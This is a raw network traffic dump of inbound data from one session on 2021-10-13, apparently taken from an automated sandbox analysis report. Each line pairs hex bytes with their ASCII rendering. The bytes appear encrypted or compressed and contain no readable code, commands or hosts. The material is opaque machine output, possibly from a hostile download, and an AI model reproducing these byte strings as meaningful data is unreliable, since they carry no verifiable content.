2021-10-13 19:02:54 UTC	690	IN	Data Raw: 0d 67 67 bc 0d 82 a2 31 e3 4d d4 00 7f be 3a fd 7b 3b 8f d0 cf a7 b3 97 a2 cd 96 3a 88 56 f7 19 0b 4d 7c 36 20 c8 6b 86 22 20 83 b1 6e 54 22 2e 92 a3 fc bf 13 1c ab 9c 02 c2 f1 fc 76 f6 90 08 a6 15 a2 08 4d 74 59 b7 cd bb f9 24 e3 b3 12 2f ba 86 6b 8f d4 6a 69 5c c3 01 54 db 14 cc ae a8 d5 06 45 69 0f e9 03 64 b5 59 4f 16 7b 8a 70 16 61 24 27 e3 5e a7 4c 44 18 52 be f4 f9 bb 06 b6 fb 59 8b dd ee 8d c4 8b 10 7c 0c 0f b4 fb d8 2b 81 b0 7b 8c 12 6d f6 c8 7b 5d 01 cf 5b da 16 ee 68 0e d9 97 9d e5 77 e0 f6 63 a7 a9 e0 93 47 7b eb ef e3 2f 0e 1f d1 51 8c 69 8c 20 64 74 b8 f3 74 65 27 d2 7e 67 45 f2 36 c9 f7 a7 f7 49 2d f3 8e 9f 8c 23 6a 34 45 79 42 4c d4 f5 1d f0 7c 7b b9 a9 c6 e2 5c 3d cc bc 70 4b 0d f4 ef 36 9a 1e 1b 94 ba fb ff c3 22 bd 5f 1a 0a 44 c4 3e 65 Data Ascii: gg1M:{;:VM\|6 k" nT".vMtY$/kji\TEidYO{pa$'^LDRY\|+{m{][hwcG{/Qi dtte'~gE6I-#j4EyBL\|{\=pK6"_D>e
2021-10-13 19:02:54 UTC	706	IN	Data Raw: b7 79 24 67 11 8d 1d b2 43 12 11 3d da 58 52 a5 3a 29 5f 60 32 7c 41 4c 06 48 c2 b0 85 c8 bd 1d 89 3e 78 26 c4 a2 44 69 89 1d 4c cb 63 84 18 fd 11 73 3f 3c 81 47 13 4c 1f 48 d8 27 88 74 89 33 8a e7 b0 08 26 3d 67 73 73 1e b6 cd c5 39 9d 84 18 17 c7 4a 53 a5 f9 7a 5a a9 1d 0d e0 9b 0b 35 ec b7 b3 0a 7a 40 09 48 2f 6b 86 e9 be 8f 77 20 46 cc 1d bc 5d a0 af 01 6a 52 90 b6 04 47 06 e9 b3 26 52 2d f5 5c fb 24 a8 d5 1c 06 11 ad 0e 66 bd 6c 3d b8 b5 61 fb c7 7e 72 a2 03 cc f4 20 a1 06 3e d0 57 a6 7a 76 04 51 37 41 d9 8b ac 24 31 13 c8 d3 bc e8 a3 7a 29 d5 b1 75 de 49 ab 71 df 5c f8 5d ed 4a 7c ed f0 86 de 92 d8 b8 ff 38 48 25 a4 d1 ad e9 58 97 73 61 99 39 86 59 0a 46 2e 56 c5 d7 9c e2 fb 94 94 8b 76 9d 78 d9 a6 7b 6c 79 95 07 f4 7e 6e 27 ba 40 98 6c d0 07 73 00 Data Ascii: y$gC=XR:)_`2\|ALH>x&DiLcs?<GLH't3&=gss9JSzZ5z@H/kw F]jRG&R-\$fl=a~r >WzvQ7A$1z)uIq\]J\|8H%Xsa9YF.Vvx{ly~n'@ls
2021-10-13 19:02:54 UTC	722	IN	Data Raw: 6a 9b 12 fa 3e dc b9 0d 0f 69 5a 54 89 25 71 23 ec a2 12 74 bd 09 a0 7d 60 40 24 dc 9d 3b ea 67 5c 48 7d 3d ef 18 7c 2f ef 8d 88 98 b0 a0 b9 66 70 c5 e0 15 70 00 fd 47 38 26 c9 5e f9 db 1e a4 e9 e2 dd 69 cc 22 3e 25 40 77 b3 b8 de e3 a7 ca 7f 96 a4 e4 f7 e5 00 26 d9 2d 2e 20 2e 4e 81 ed 75 50 98 6e 89 b9 77 cf cb 3a ed e7 6a 91 5e 51 a9 4c fa 16 66 90 cc cb 8e 8a d1 68 69 1d 15 da 49 54 d0 ce 4f 48 b1 31 62 1f 2f 1a 0f d3 94 2b 9b 45 93 2a 4e 09 eb b2 dd 03 c8 be 76 ee f0 0a 94 29 91 75 93 bb b7 00 b1 75 9e 15 e8 19 6b 19 2d fa 68 fa 9b f1 91 ce 1e b4 e9 7a 29 b3 bb 22 b1 f6 a3 fb 93 d5 e4 24 e6 3b f2 8b ff 08 79 01 e2 73 df f3 00 fc 6c da 69 3d 3c a1 21 11 eb e7 9c c4 55 dd 75 09 ac c6 f2 e2 7d 0b 54 ff 5e 01 ae cd 42 2d 1f c0 8d ea 0f 3c f6 84 71 54 51 Data Ascii: j>iZT%q#t}`@$;g\H}=\|/fppG8&^i">%@w&-. .NuPnw:j^QLfhiITOH1b/+E*Nv)uuk-hz)"$;ysli=<!Uu}T^B-<qTQ
2021-10-13 19:02:54 UTC	738	IN	Data Raw: 05 c7 29 4f e7 76 cc 5a cd d8 a4 d1 ae ca e0 ba fa 8f 4b 1b 18 79 9b d6 08 8a 16 03 ad a9 cb 89 34 70 e6 73 b9 e5 b8 fa 35 ab bc 50 28 49 1e 09 2b 90 04 ee f9 86 71 6d 75 25 1e 0b 33 35 8d 57 9e c6 9c b9 f8 57 57 41 fc e1 f2 5f 70 83 6f 32 fb 17 b7 24 b5 70 f6 cc e1 12 b4 03 91 dd 7a 30 b8 c8 59 bf ec d1 b9 b6 a0 e3 52 69 c5 7d 08 14 5d c9 0c 84 53 d8 16 b6 c6 89 28 d2 b8 dc fc cb 7d fd 1b 94 20 87 ce 9a 7c 1f 6c ef ab 37 3e 44 bf 3c 19 e3 20 d1 1d 6d 50 f9 64 0c f7 96 13 9b e9 b5 5f d6 5e d7 50 16 1c 79 30 bf 3e 10 ff 40 85 60 21 58 ac 42 ba 3d 4b af d6 50 b8 ff ec fa 97 a2 8f 5b 15 c6 c8 9d 0e c6 16 5c a6 be 86 e1 a0 bc 26 5b 64 e9 a5 92 81 7e ef e9 2f dc e1 ab 8f 4d e3 c7 36 7d 28 88 67 86 9d c2 d3 13 08 22 36 6a 17 91 7e 9f ec 58 75 a0 57 27 cd 3a 58 Data Ascii: )OvZKy4ps5P(I+qmu%35WWWA_po2$pz0YRi}]S(} \|l7>D< mPd_^Py0>@`!XB=KP[\&[d~/M6}(g"6j~XuW':X
2021-10-13 19:02:54 UTC	754	IN	Data Raw: 08 d2 4b 43 25 9a e4 cc 9b 5c 96 70 05 79 fc d3 0d 83 d4 4a 07 7d 05 4e d6 54 44 e9 ac f4 fc 7e a6 45 e6 c5 61 0c 67 e4 48 ce b1 71 a2 1d 01 35 25 10 f5 bf 54 c8 e2 17 a0 93 84 a0 66 40 0f 0c a7 4d 51 8e 30 97 60 5f cf 11 04 18 0d 51 ef d5 4b ef f4 e1 3a b8 53 54 53 af 0c 58 0c d0 61 d4 16 c8 2c 70 59 42 e6 14 4b e5 ea 8f 36 3d d6 9b b6 29 39 81 e2 73 45 65 83 e8 56 8b 97 f8 63 69 94 31 dc a9 87 1f b1 23 1b da 5d 5b dd a7 fb 35 a1 d8 ae 5b ea af 6b 64 b9 98 a5 94 9e 68 88 15 a2 c0 97 a7 47 ee 90 5e 8c 50 02 06 7d 78 1a 66 77 cb 59 39 2b f8 ce a7 8b ee bd ba 1e 33 16 e5 b2 02 d0 5a d9 26 98 3a 47 6a 3f 32 6e 1e 10 fc 7c df 0a 33 b3 9e 38 ce e2 8b 4e 09 b5 d3 75 cf 74 1e 8f 7a 15 e9 a7 61 30 1c ed c2 4a cc 82 fe 77 71 ba 9e f6 17 b6 72 d4 48 5e 50 fe 6d cc Data Ascii: KC%\pyJ}NTD~EagHq5%Tf@MQ0`_QK:STSXa,pYBK6=)9sEeVci1#][5[kdhG^P}xfwY9+3Z&:Gj?2n\|38Nutza0JwqrH^Pm
2021-10-13 19:02:54 UTC	770	IN	Data Raw: d3 d7 b5 51 41 28 b5 79 81 16 68 f3 c3 97 00 eb 41 a4 5e ae 4e bc 2d ea ce b7 c3 e7 7b 65 7b 46 e2 4c ea 5b be 52 b7 6c 45 0f 24 6d b3 96 f0 ed 93 12 86 b8 89 d9 1a 7e d4 76 c1 33 65 a2 72 6f 77 db 3f 04 5b f4 28 32 d4 60 4e 56 b0 45 6c cc 66 57 3a 75 a3 f4 12 50 3c dd 81 14 8d 67 3f b0 d4 d4 13 c6 74 77 8b 07 0c 89 03 96 cc 25 9e 9d 62 43 48 22 f4 c6 0c 85 01 87 6a 53 ea f0 e0 36 ec 58 18 4a 35 56 60 5e ad 6b c6 cb ef 6c c8 6e cb db c7 ca 9b e3 03 3a 4b ff b3 3a 5c f8 41 e9 c6 32 77 92 7b 44 24 d9 68 08 17 ad ab 88 b4 2e e7 b3 a6 62 3c 69 26 fc b5 37 ef 9a ce d0 f8 37 b3 5f f0 95 fd 9c 6d 28 c0 2c a2 d0 10 34 39 ce f8 8f 83 b0 fe 78 b1 76 4d fd 32 f0 4e 59 1a 89 6d 04 66 21 16 a5 b0 c9 34 c8 09 71 49 f8 50 b6 ca b2 a0 2b f5 02 16 87 3e 26 73 59 da 4c 03 Data Ascii: QA(yhA^N-{e{FL[RlE$m~v3erow?[(2`NVElfW:uP<g?tw%bCH"jS6XJ5V`^kln:K:\A2w{D$h.b<i&77_m(,49xvM2NYmf!4qIP+>&sYL
2021-10-13 19:02:54 UTC	786	IN	Data Raw: c3 ba 70 5b 12 85 f5 e1 18 25 d3 bd 7a 31 b2 8d e0 82 f4 e3 ed f3 1b 60 a0 82 ab cc 54 9d d2 e1 82 dc 79 82 5e 24 9d b9 42 4d cf 3b 2e ef 35 f5 6d 7f 53 da 17 cd bd 14 f9 c1 09 8c 72 a0 7c fd 4c b8 98 a8 70 48 3c 23 a4 09 8d 84 4d ce 01 85 69 d1 a7 7b fe e0 75 6b a6 24 9d c0 2d b2 2c 9c 74 87 bd 58 4d 62 fd ec 32 07 76 04 21 e1 0e 63 68 f2 38 ae ed a1 96 3a e9 a3 2c 12 c9 d2 9b 32 d0 a9 64 b4 4a cd d6 23 27 2a 39 5b fc 25 3b af 48 c1 f6 54 3a cd c4 10 1a ea 35 19 ee 3d dd e4 0a a7 ab a6 42 a5 33 3d 5c cc 5e ae aa 49 6f 77 e9 ea 09 a5 82 ef b2 3c 6e 34 ff 3f b9 bd c6 c9 07 35 08 8f bf 66 f7 5c 50 86 dc ce 51 86 80 98 62 8b a7 3d 8a e6 23 25 b1 07 52 cd ee f7 4e ff 17 e8 cf b6 c5 43 de de 76 f9 06 1a 7d 2f 9e b3 4d c3 91 96 21 9e 01 cc 50 91 d8 f4 b7 d1 d7 Data Ascii: p[%z1`Ty^$BM;.5mSr\|LpH<#Mi{uk$-,tXMb2v!ch8:,2dJ#'*9[%;HT:5=B3=\^Iow<n4?5f\PQb=#%RNCv}/M!P
2021-10-13 19:02:54 UTC	802	IN	Data Raw: 8e c0 56 9a dd 03 ad e0 ff b2 f0 1a 46 b8 5e b5 75 74 ac eb ba f2 31 e2 aa ce c8 e3 2b 13 4c 7d d5 ac 82 1e 04 41 f2 c1 d8 ab 10 1b 0e 38 4c 96 59 22 c7 1f df 17 cc 19 75 29 c1 91 d1 a1 a5 72 f9 12 f1 36 b1 88 f9 65 e7 0e 74 81 53 8e 94 71 8a a9 a9 61 8d 8b a5 b3 f6 7c d2 8c 34 84 6e 32 e3 62 82 90 19 0c 2a a8 c3 71 c3 16 d0 57 e1 b5 e2 23 a5 6f e5 76 cd 51 49 9e 30 1f 17 a3 b3 98 1e 88 33 bb 79 fe 8d 3e e2 c0 15 b1 af c1 0f b7 98 0a d5 e7 0e fc 66 f7 e7 7f cc ce 8f bd 76 b4 84 e0 f0 e6 a3 e5 27 a9 11 79 c3 41 78 67 c5 c8 e5 a4 14 07 fb e7 dc af a0 76 e7 d9 ae 21 8d 3b 59 7c 4d c1 10 22 56 4c bd b9 51 06 78 ad ad 33 fc 86 ae 16 0d 18 8b ab 53 76 f4 7f 20 af cf f7 72 9b aa 08 01 00 00 d8 5e 57 1e f9 3f 3e 2c 76 f4 6e a6 2e 47 1b 21 3b 07 38 03 dd 1b 0f c7 Data Ascii: VF^ut1+L}A8LY"u)r6etSqa\|4n2b*qW#ovQI03y>fv'yAxgv!;Y\|M"VLQx3Sv r^W?>,vn.G!;8
2021-10-13 19:02:54 UTC	818	IN	Data Raw: c7 16 03 20 78 1a 55 c9 b6 8e a4 6e a8 14 a0 f5 ae 2b a1 17 cb c7 c0 63 b3 01 e5 57 b7 47 17 29 70 eb 07 41 77 38 be 57 59 e0 6e 85 c2 81 80 27 be 4e 0a d6 26 2c b8 47 53 8b d4 99 7b 4c aa f4 40 9a f4 03 2e 6f 96 70 76 d5 9e 95 c0 45 06 97 ea 83 60 ed bd ad c6 b0 4a 02 7e fd 11 98 eb 3b 95 c8 5a 5a 65 11 91 be bc 66 c3 81 fe e0 87 b0 0d 92 fb 08 10 e0 2f 2f 94 a4 94 19 7e 25 93 f6 d2 af f2 b3 a8 b7 b6 77 bf 23 7c d0 f3 7b f2 81 91 f5 20 34 7b dc f2 4b 3d f7 34 b0 df 40 59 1b db 06 14 74 a3 ab b6 9b d6 92 16 e1 a1 71 3b a7 f1 a2 63 f6 b0 bc 7e 1f a0 95 a8 a4 9c 34 29 e0 c7 57 28 e6 2f 94 9d 0e 53 a8 bd d1 3f 95 d5 f2 ad 76 78 a3 1d 97 d1 ef b1 c0 68 47 ed 41 3a a2 4e bb 6e e5 ad 0b b3 b3 a9 b5 dc 75 5c d7 65 43 f0 a3 7f cb e3 12 c2 0b a4 c0 ca be d4 fd a1 Data Ascii: xUn+cWG)pAw8WYn'N&,GS{L@.opvE`J~;ZZef//~%w#\|{ 4{K=4@Ytq;c~4)W(/S?vxhGA:Nnu\eC
2021-10-13 19:02:54 UTC	834	IN	Data Raw: 9c eb 72 5d b1 2a db 5a 52 8f 02 1a 98 03 a9 8e 54 de 1d 21 a6 8e 94 86 f0 92 24 6d 96 93 d0 a2 46 66 29 97 2e b9 3d 9f 3f 98 56 20 8e c9 31 da a0 28 0d 5e af 1e 5e 21 e5 33 84 b9 a1 36 70 73 a6 03 7e ea 29 da 35 bd fc e9 d7 10 92 63 2b df c0 11 9b 14 0e ce a1 1e 9d 69 10 1f 49 bc 50 f4 ad 62 83 61 f1 8e 98 c9 2e 40 8e fd 2d fc 53 00 69 b9 eb 54 f9 c3 3b 0b 05 86 c2 16 3f 1d b4 e5 ed a8 dd 45 af ad 4b d6 f8 28 3e 84 5b e0 bb 2e 4a c2 2f 21 ba dd b1 da 96 b1 1c c2 8e 96 b3 e1 90 d2 15 9e f0 66 c7 bc 5c 71 5d 2d 06 cf c3 d8 9e 28 98 db 3c 01 bc 14 99 6b fc 09 d8 f1 ef a8 07 db 7b 6a 4f 2b 04 c0 4b a7 03 b7 37 ff b8 6e 30 22 ee fa 55 e9 08 ed 5f 70 c2 4e aa 9c f9 55 4f 3e 06 7c 16 61 66 fa 31 bb 94 75 56 6a 16 e5 84 d2 a9 8b 69 e8 c0 a5 e2 3d 1b 19 41 33 37 Data Ascii: r]*ZRT!$mFf).=?V 1(^^!36ps~)5c+iIPba.@-SiT;?EK(>[.J/!f\q]-(<k{jO+K7n0"U_pNUO>\|af1uVji=A37
2021-10-13 19:02:54 UTC	850	IN	Data Raw: b5 76 5a 90 aa 2f ef a1 dd d2 63 95 4f e3 c7 e4 e8 78 34 db 7e b8 c7 87 ef ac ed 30 29 90 00 fb 63 b2 d1 75 05 ab 83 47 b1 23 d1 2c 73 a8 21 2b ca 3c b2 49 74 56 08 b3 11 88 e2 cc 3c cb 9d d1 0b 94 e3 27 e8 4c 74 8d b4 c3 b2 5b 22 b8 8e 83 3d 86 e1 72 e2 51 0c 3e 07 4d 46 45 ed bb 93 ff 84 53 9d 17 05 ee 60 a3 fa b2 2e 1f d9 9d 79 a2 47 2e 64 01 8f ea ee f2 53 24 92 b5 1a 00 af 06 29 fe 5b bb a9 db 59 7e 4d 60 40 07 5d e8 e0 9f 80 60 9c e1 57 84 c1 e1 cc 79 79 d7 88 4a a6 1d 14 23 02 1b 16 07 e5 25 65 c3 ee 46 3c ec 57 0c 3a 35 90 40 cd d5 ac ad 6c a6 4d c7 60 54 84 35 68 d0 4b c0 b0 0e 3c b6 68 47 18 ca c1 a8 47 cd d7 c9 f4 8e 08 16 6f 40 5f 9e ab 44 f3 b4 5d 55 61 f8 35 58 62 ea 0d 8a 9d 3e 30 7f 38 1f 39 82 14 05 8d 42 29 73 03 ec ae 61 c1 73 b9 34 bc Data Ascii: vZ/cOx4~0)cuG#,s!+<ItV<'Lt["=rQ>MFES`.yG.dS$)[Y~M`@]`WyyJ#%eF<W:5@lM`T5hK<hGGo@_D]Ua5Xb>089B)sas4
2021-10-13 19:02:54 UTC	866	IN	Data Raw: 16 3e 47 38 31 56 be f5 7b 12 b0 10 a1 27 6f 2c 1a 32 cb 58 e2 ea dc 38 fc 14 9d 7e d2 e6 29 0a 2d 1b 43 83 7f cc b9 e0 bb ae 90 a7 e4 c8 b6 01 58 bc a5 a4 5f 4c eb d6 a5 0c c7 23 aa 12 eb 7d dc ee 6c 0f 3f 8e 4d 51 63 d3 0c 90 a8 83 0c dc ec ae c5 4f 5b ae e6 23 fe 15 a2 a9 c7 ac 32 ae d1 e9 ed c2 ea fe 9a b8 bc 8d 8c cb 89 fd 47 ff 54 e6 83 3a d9 b7 89 14 8c f2 f7 74 3b 52 54 73 7a 6c c5 fc ac e3 a3 7c 9f c8 b5 a0 9a 47 80 ff 6c 19 e3 40 f4 e5 47 9d f2 d5 2e be c5 0f e2 6e b4 1b 58 b6 cd 0d 63 cf 2e 43 7b 7c f5 a9 94 f6 3a 36 d4 12 7d eb d9 a3 c9 da 71 95 42 37 e2 60 4c 3c 88 ad 32 30 e8 c4 bb bb b2 d6 bf b1 d0 54 f0 c9 28 97 cf b2 49 f9 c2 0b 96 ba 24 23 16 bd 0e 43 4f 55 68 10 76 81 74 f0 bc c9 55 6a bc 98 1d a6 59 ba 86 44 6d d3 c2 25 11 8a 4e 67 ab Data Ascii: >G81V{'o,2X8~)-CX_L#}l?MQcO[#2GT:t;RTszl\|Gl@G.nXc.C{\|:6}qB7`L<20T(I$#COUhvtUjYDm%Ng
2021-10-13 19:02:54 UTC	882	IN	Data Raw: d5 51 14 3a 7e 4d 99 37 57 a6 8a cf 3c 55 31 35 61 fd b6 cc e9 e7 03 31 36 7b ad f3 78 0f 94 86 77 1a cc 0d cb 20 20 8d bb c4 12 d1 50 0e 72 1c a7 ad c3 ef 02 72 83 4a 70 0a 7c 7e d3 31 e4 f1 7f 07 c5 d0 fa 63 a6 df 13 de 76 56 6b 06 06 03 35 ef a6 b7 1d 16 46 7a a4 89 1c 3e d2 0c b8 c2 fe af 5e 4f c2 66 12 4c ec 80 c4 90 02 c8 86 97 4b 92 68 a3 20 5d 59 04 a2 23 fc 19 fd 56 f4 4d 6f c1 cd 9e 0c 41 97 65 02 b2 0a 4c 46 ea 63 1a e3 32 64 6b dd 61 cf 93 29 a2 a7 2c 80 3c 69 c0 30 6a fe bf 70 ca 4b 16 8c a0 ea 9a 63 c8 c6 67 91 d6 47 3a 16 a4 0f 94 e8 c9 cd 94 22 ee 68 07 02 5b 5a 9b f6 cc cb 53 93 52 3f 34 9e 7d 2e 85 58 26 d2 17 be 92 08 19 53 72 b6 06 04 c8 26 88 0a 8a fd e7 a3 88 b2 67 eb 35 26 8b d9 a0 ea f7 80 3a 26 d5 05 d3 3b c4 26 3d 3f c2 bd cc fa Data Ascii: Q:~M7W<U15a16{xw PrrJp\|~1cvVk5Fz>^OfLKh ]Y#VMoAeLFc2dka),<i0jpKcgG:"h[ZSR?4}.X&Sr&g5&:&;&=?
2021-10-13 19:02:54 UTC	898	IN	Data Raw: 3d cc 0b 1e 36 4d 7c aa 0e 54 0d 27 4c 97 79 ac b3 82 46 a2 c3 bb 97 31 ce ee 9f 34 54 34 ef 73 69 a7 03 4b 7a 9e 45 0f 60 0f 73 df 43 94 f7 71 4d e4 59 90 4f 6e 69 ac 33 23 71 e6 5c 52 3d 61 60 9f cd ac 87 20 f4 49 ff a2 39 9e dd 58 1b 9b b8 72 34 e4 d5 41 5c 64 e9 0d f4 da 75 49 80 62 d8 ff c3 e5 e9 bc c1 b2 70 15 a0 a5 0a 4e 6a 54 c7 4a ad c8 d2 8a 29 93 36 a5 43 af 7b 85 8d 99 af 1f 5d 57 a9 97 7c 91 bd aa 26 cf 2f ad ad 4a d9 79 b6 39 63 c1 a0 3d c4 ef 27 58 2d 73 b2 dc 7e 1e 9c 87 75 0a 16 fa 85 99 20 7b 41 21 07 33 eb 3b ca 6e 7e 53 8c c9 5e 28 43 7d 19 36 86 67 a9 2f c2 7b e3 47 c2 31 19 c2 6a 35 c6 9d e1 b8 c3 d8 2e a0 d9 50 02 0a 67 42 c0 54 cd fd 36 45 54 66 e4 74 13 4a a3 fa 5d bb 38 c5 60 56 3b e2 f4 2f 7d 3d b9 1d 00 14 9f 6d cd 3a 89 99 c4 Data Ascii: =6M\|T'LyF14T4siKzE`sCqMYOni3#q\R=a` I9Xr4A\duIbpNjTJ)6C{]W\|&/Jy9c='X-s~u {A!3;n~S^(C}6g/{G1j5.PgBT6ETftJ]8`V;/}=m:
2021-10-13 19:02:54 UTC	914	IN	Data Raw: 7c 47 2d b4 5c ae 4f 77 ba b7 78 f3 f6 aa 7c c2 33 6c 80 9a 6e 49 b7 15 e4 6f d7 ee e1 73 ac 68 e5 d5 73 5a 3c b7 a2 e4 0f 0d ff 11 b2 d4 c4 5c 6e 69 c7 02 99 d6 36 3e fa 97 49 fd 38 63 c5 01 b4 bf db d8 9b a1 31 49 af 57 11 19 d8 35 5b 03 a6 42 14 6f 8e ca 58 57 3e 0e 02 eb a3 db 33 4e 16 b0 d6 40 90 f8 38 f2 03 7b c0 7c f8 02 4b ea 22 40 a9 32 c0 26 fd 32 01 6b 4e 4d f6 09 fd 21 0c fa a5 cb 81 6b 51 db 09 73 39 a4 29 0c 1a ce b4 96 9b 34 55 1a 8b cb 4c d5 43 26 95 de bf 2c 4c 34 85 b3 ad 19 23 bc 31 c1 5f 1a 04 9a 17 2e 4f c6 a0 7e ae 21 8e 5b ab d4 36 cc e2 d0 0c 6d d8 e2 e0 e4 9b 62 46 8a 72 61 1c 2b 79 dd 3b 30 7d b9 fb 09 74 bd 4f af 23 de 8f 41 73 da a3 02 ba d1 8f 46 88 d2 d6 1a 81 6b ec b4 10 f6 4d 65 31 52 2d 29 4f b4 0a 70 0b f2 7d 5e 71 f1 05 Data Ascii: \|G-\Owx\|3lnIoshsZ<\ni6>I8c1IW5[BoXW>3N@8{\|K"@2&2kNM!kQs9)4ULC&,L4#1_.O~![6mbFra+y;0}tO#AsFkMe1R-)Op}^q
2021-10-13 19:02:54 UTC	930	IN	Data Raw: e7 5c b3 ee 60 99 a6 40 24 0c 81 37 5a 10 92 f4 bb a0 c4 98 75 44 3c a3 47 98 70 13 2d ed 7f a6 0a 06 c9 88 2b e3 fa 71 7d 2d 59 da 44 26 f2 e4 a9 9e 19 6b 89 9c da 6f 94 c5 4e 22 80 20 a7 a4 14 67 16 e7 60 25 b7 9b ae 19 34 29 0c 6d e5 b3 f5 e1 c2 a7 65 8a 21 d1 47 6d 9d 63 e2 11 69 5b 48 ca 32 e2 7f 3c 59 74 2b 19 af 5f be 68 c5 9d dc 2e a1 aa 45 e1 55 e8 97 c0 00 36 f1 fd a3 18 ee 35 92 ce ac c3 86 45 75 3e 3b 25 fa 4f 3c 20 de 93 bd 40 f0 97 18 e3 47 e3 9d a4 f7 22 a3 3d 69 a5 f5 ff 26 ee f9 79 03 77 2e ca 12 81 52 62 00 5a 15 2b d4 ac 28 d6 ce b8 a0 05 0b fb 0e ea b2 92 22 c0 ca fa 00 00 85 5e f4 3c e2 63 64 6f 4b fe a3 5a d7 0b b0 e9 99 6c 1b 6c 0f 07 34 ed 07 e7 fd be d1 63 8c 76 af 5b d6 eb 37 ed dd e5 98 1c e6 ec 21 e4 b0 f6 51 59 55 41 c5 2e 2a Data Ascii: \`@$7ZuD<Gp-+q}-YD&koN" g`%4)me!Gmci[H2<Yt+_h.EU65Eu>;%O< @G"=i&yw.RbZ+("^<cdoKZll4cv[7!QYUA.*
2021-10-13 19:02:54 UTC	946	IN	Data Raw: 3d 9b 18 4b 34 88 09 aa 00 17 f5 17 b4 37 88 62 e4 30 a7 65 8b 00 a6 29 9b db b4 76 a9 9c 44 de 0c af 53 06 02 f0 ba 03 8c 36 9c 47 3a f0 c7 58 2b 72 be d6 80 a9 b2 59 65 81 e7 6c d4 df e0 22 d3 86 fa 20 fa 2a 89 2e 6b 5a a8 1d 09 7e d6 b7 88 69 cf ee 1d 2b 3e 8c ad 90 d1 42 49 a1 d5 8f 90 9d da 31 14 2b cc 77 c2 a7 34 49 ae 29 d8 14 af 45 12 3d 83 fa 42 a3 f4 29 ed ce 59 5d 43 9e 0d 37 c6 35 30 e8 c0 ec ab fc 17 cc 71 76 de be f0 51 65 17 8c aa d6 da 1a 85 bf 0a 33 1c d7 f6 8b 09 ec ff 88 42 db da 52 af c5 68 0d c1 27 ff bc d7 8b df d2 4c 9c 88 1e 54 95 60 07 88 c3 c4 9c 4f b8 86 dc 97 f0 3e 32 6c bf 74 98 70 55 51 d2 08 79 af 1c 55 25 fd 49 4e 56 3d ae bb f7 0a a6 9a 6e de be db 9e 1a a4 23 d5 6a 6e 54 fe 87 e8 47 6a 24 d2 68 bf cc 22 24 b5 ef 47 ca a4 Data Ascii: =K47b0e)vDS6G:X+rYel" *.kZ~i+>BI1+w4I)E=B)Y]C750qvQe3BRh'LT`O>2ltpUQyU%INV=n#jnTGj$h"$G
2021-10-13 19:02:54 UTC	962	IN	Data Raw: c6 db 9b 10 31 8b fc 49 64 81 4a 3e 56 88 24 e9 15 7a 12 96 36 a7 fd b0 ef 66 f6 76 33 bb 41 76 2c c9 10 28 ff 1a 60 e9 de f6 9b 1f 49 6e cc 1c 32 21 d2 1e 0a 12 77 0c ab a7 af 3f 0c 8a f2 54 c8 45 64 2a 01 55 ca 35 ec 62 4e 73 49 97 d1 7c 46 3c 4e b6 06 14 12 cd 79 cd b9 b3 50 af c1 4e a8 6f b7 b7 28 a4 57 7d 27 ce cb 32 de 5d 29 52 28 09 59 5f b4 dd 29 2e 8d 88 15 b9 6f 01 66 2a 41 1d bf 3f 4f e1 b8 d8 4d 0a 2c d4 14 03 3c 4b 7b a6 38 1d 63 3c 1a 46 da ab 43 61 f8 1a e0 28 d8 42 f5 5a fd 16 e9 62 95 93 c4 0f d2 36 8f 70 4c 3a e5 7b ea 24 47 28 98 dc de ef f9 7d 6c 2b e0 bd 1a 5e a5 9f f6 49 61 ee 62 b4 57 d2 93 85 99 2e 95 39 cd 86 72 50 dc 52 13 07 2d bb ed 1f 08 53 35 74 1c dd 64 fd 7f d0 8c d6 22 e2 c8 1d 56 da 27 7b aa 7a b1 a7 3f 58 a7 03 88 1d 0d Data Ascii: 1IdJ>V$z6fv3Av,(`In2!w?TEdU5bNsI\|F<NyPNo(W}'2])R(Y_).ofA?OM,<K{8c<FCa(BZb6pL:{$G(}l+^IabW.9rPR-S5td"V'{z?X
2021-10-13 19:02:54 UTC	978	IN	Data Raw: e1 2b b9 81 f6 3a 6f 5d 67 38 13 e2 a9 1f a9 e7 4d bf 25 ae a7 5d f1 15 46 69 4b b8 14 9f 9c 36 69 af 01 15 f9 bd 40 26 1d 75 05 44 2a 06 f7 2b 69 8e 2c 1c df b3 ed 35 f2 cc 49 2c bc 52 a3 49 a5 ef 99 8e 8f 08 2d a1 cc 95 de f7 73 e7 9f fd 80 09 a6 70 92 90 8d 7a 42 6c dd 12 ab 2e 13 05 36 ae 39 3c 6d 62 9c e9 c1 6a 5d c8 40 18 cf 79 1c 52 29 bf 65 85 a3 42 f3 13 75 a0 70 db 83 10 83 03 49 2f d5 5f 04 f3 da 3d 7d 4e 91 fc 0c 5d 6a 07 a4 66 54 11 28 bc 33 29 4c 64 47 3e 7e 2b 50 7b 0a 7d 9f 90 e1 07 20 dd d4 da 67 7f b8 0d a4 09 78 0a 9f 3e b5 bd 39 e3 4a 01 24 c2 9f 0b 72 b3 32 ea 31 8c 7a 0d d6 08 56 fb ef ea 89 2b 7c 18 90 3a 0a 52 16 01 c9 d3 18 d5 47 1c 0b 22 d4 f5 2b 6d 6b 21 6c f0 76 91 a7 77 8e cf 0d da 5e a8 36 d0 2b 98 6e 1e 8b 89 66 69 4a 21 ca Data Ascii: +:o]g8M%]FiK6i@&uD*+i,5I,RI-spzBl.69<mbj]@yR)eBupI/_=}N]jfT(3)LdG>~+P{} gx>9J$r21zV+\|:RG"+mk!lvw^6+nfiJ!
2021-10-13 19:02:54 UTC	994	IN	Data Raw: 31 58 66 24 f8 91 5f 71 08 fb db 34 6e 05 4e 1b fb d8 0d 4a e1 69 f1 78 35 c2 5b ae ce 82 29 22 4b eb 00 b4 b2 e6 d4 db 46 c3 5d a1 c3 12 80 68 1d 9f 1b 2e 20 30 bf 68 7a 70 bf 0d 32 1a c9 fa 0b e6 16 66 ca 7b 32 37 93 fb 7b e8 98 a5 21 3d bf 0f 44 be dd 11 f8 96 9a 4c b9 92 ba ce 0a 2f bd 44 29 0f 61 03 d4 66 a2 0c a6 b5 a1 e9 8e d9 0f 6a 22 08 83 dc b1 47 2d 54 e2 0e f4 2e d5 0f 2a 67 fb 80 58 8a c8 76 b4 ac 63 ca fe 30 ef 72 80 0b 10 23 06 b6 f1 93 3c dc 59 a5 ea 63 2f bb 7a be 16 73 d5 e5 34 b9 70 87 bd 60 92 28 c1 b4 d3 03 b0 fe 9a cf 8e 68 2e 11 65 b5 73 ba 45 86 94 d9 4c 58 0e 0b 2c 19 a0 26 c1 cf 1e 51 d2 c4 7f d0 dd 51 a9 84 92 e7 3e e6 78 72 1b d9 4d e6 e1 ca af 55 26 8c 11 be f6 1f 25 8d d9 28 dc 40 11 9e 7c c0 a5 b7 fa 42 ef 52 64 f6 f8 6a 63 